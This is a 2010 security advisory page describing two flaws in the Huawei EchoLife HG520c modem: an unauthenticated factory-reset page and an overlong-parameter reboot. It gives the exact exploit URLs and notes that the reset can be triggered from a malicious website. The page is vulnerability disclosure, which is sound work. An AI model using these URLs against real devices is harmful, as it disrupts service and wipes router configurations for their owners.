Skip to main content
Websec Logo
High May 13, 2010

Huawei EchoLife HG520c Denial of Service & Unauthorized Factory Reset

Huawei EchoLife HG520c modems expose an unauthenticated factory-reset endpoint and an authenticated remote reboot page, letting an attacker on the LAN or via a malicious website disrupt service and wipe the device configuration.

CVSS Score

7.7 / 10.0

Severity

High

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Advisory

DeviceHuawei EchoLife HG520c
Firmware3.10.18.7-1.0.7.0, 3.10.18.5-1.0.7.0, 3.10.18.4
SoftwareV100R001B120Telmex, V100R001B121Telmex
Websec AdvisoryWS10-09

Description #1 — Unauthenticated Factory Reset

The page /AutoRestart.html restores the default configuration and reboots the device. It does not require authentication.

Exploit #1

From the LAN (or client-side with the page embedded in a malicious site):

http://192.168.1.254/AutoRestart.html

If the remote admin interface is enabled:

https://<router-wan-ip>/AutoRestart.html

Description #2 — Authenticated Remote Reboot

The page /rpLocalDeviceJump.html reboots the device when the index query parameter exceeds seven characters. Requires an authenticated session.

Exploit #2

http://192.168.1.254/rpLocalDeviceJump.html?index=HAKIM.WS

Remediation

Disable WAN-side HTTP administration. No vendor patch available.

Share this advisory:

Related Security Advisories

Stay informed about other recent vulnerabilities and security advisories

Critical December 18, 2014

Command Execution and Backdoor in Zhone GPON-2520

This post will describe a backdoor account found in the Zhone GPON-2520 and will provide a PoC which can be used to disable the firewall filtration rules in order to allow access to services such as ssh, telnet and ftp.

Severity:
CVSS: 9.8
View advisory
High May 22, 2014

Huawei HG8245 / HG8247 WPA Generator

Huawei HG8245 & HG8247 ONT (firmware version V1R006C00S100) rely on a weak algorithm to calculate the WPA keys, keys can be predicted easily using the WiFi's MAC Address (BSSID).

Severity:
CVSS: 7.4
View advisory
High December 19, 2013

Arbitrary Command Execution in Alcatel-Lucent I-240W-Q

The Alcatel-Lucent I-240W-Q ONT's Diagnostics page does not filter shell metacharacters in the IP address field, allowing any authenticated administrator to execute arbitrary commands as root and fully compromise the device.

Severity:
CVSS: 8.0
View advisory
View All Advisories